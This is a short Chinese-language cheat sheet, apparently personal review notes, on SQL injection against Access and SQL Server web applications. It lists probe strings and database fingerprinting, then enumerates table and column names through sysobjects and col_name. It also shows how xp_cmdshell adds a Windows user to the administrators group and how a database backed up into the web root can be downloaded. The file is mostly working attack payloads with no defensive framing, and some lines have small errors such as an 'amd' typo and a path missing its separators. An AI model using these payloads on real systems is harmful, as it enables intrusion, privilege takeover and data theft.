温习sql injection.
(1)
简单判断:
1: 、; 、and 1=1 ;and 1=2 ----通过提交特殊字符
2:and user>0 ---判断当前连接的用户名
and (select count(*) from sysobjects)>0 -SQL SERVER
and (select count(*) from myobjects)>0--ACCESS
---------------------------------------------------
根据数据库所特有的数据名
---------------------------------------------------
(2)
select * from table where size=num And [查询条件]
id=num and (select count(*) from Admin)>0 ---表名
id=num amd (select top 1 len(username) from admin)>=0 ----字段长度
pswd同理
(access:asc(字符)) sql server:unicode(字符)
(3)
id=num ;exec master..xp_cmdshell "net user name pwd /add"
id=num ;exec master..xp_cmdshell "net localgroup administrators name /add"
(sa权时 直接得到系统权限)
(4)
id=num ;and db_name()>0 ----获取连接数据库名
id=num ;backup database 数据库名 to disk=c:inetpubwwwroot1.db;-- ---将数据库备份到web目录后直接用http下载
(5)
id=num ;and (select Top 1 name from sysobjects where xtype=U and status>0)>0 --- xtype=U and status>0,表示用户建立的表名
(6)
id=num ;and (select Top 1 col_name(object_id(表名),1) from sysobjects)>0 -----从前面拿到表名后,用object_id(表名)获取表名对应的内部ID,col_name(表名ID,1)代表该表的第1个字段名,将1换成2,3,4...就可以逐个获取所猜解表里面的字段名.